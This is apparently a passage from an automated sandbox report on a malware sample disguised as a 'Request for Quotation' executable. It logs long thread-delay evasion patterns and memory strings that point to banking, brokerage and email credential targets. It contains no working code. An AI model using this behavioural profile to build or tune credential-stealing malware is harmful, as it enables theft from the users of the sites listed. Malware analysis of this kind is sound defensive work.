                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597139s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -597031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -596047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -595062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -594843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -594720s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe TID: 7560Thread sleep time: -594594s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep count: 31 > 30
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -28592453314249787s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736Thread sleep count: 1284 > 30
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7736Thread sleep count: 8573 > 30
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599541s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -599000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598560s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -598000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597885s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597344s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597232s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597125s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -597016s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596219s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -596000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595891s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595766s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595641s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595312s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595203s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -595094s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -594984s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -594875s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -594765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -594656s >= -30000s
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe TID: 7732Thread sleep time: -594547s >= -30000s
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580Thread sleep count: 1317 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580Thread sleep count: 1251 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580Thread sleep count: 851 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580Thread sleep count: 1244 > 30
                Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 6580Thread sleep count: 1094 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599326Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599107Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 599000Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598344Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597797Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597469Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597139Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594720Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeThread delayed: delay time: 594594Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599891
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599781
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599672
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599541
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599218
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599109
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 599000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598890
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598560
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598453
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598344
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598219
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598109
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 598000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597885
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597781
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597672
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597562
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597453
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597344
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597232
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597125
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 597016
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596891
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596766
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596656
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596546
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596437
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596328
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596219
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596109
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 596000
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595891
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595766
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595641
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595531
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595422
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595312
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595203
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 595094
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594984
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594875
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594765
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594656
                Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exeThread delayed: delay time: 594547
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, 00000009.00000002.3826307981.0000000001348000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllfoX
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.0000000003BD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: NuDUTBObHpKADz.exe, 0000000E.00000002.3838707047.00000000038B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
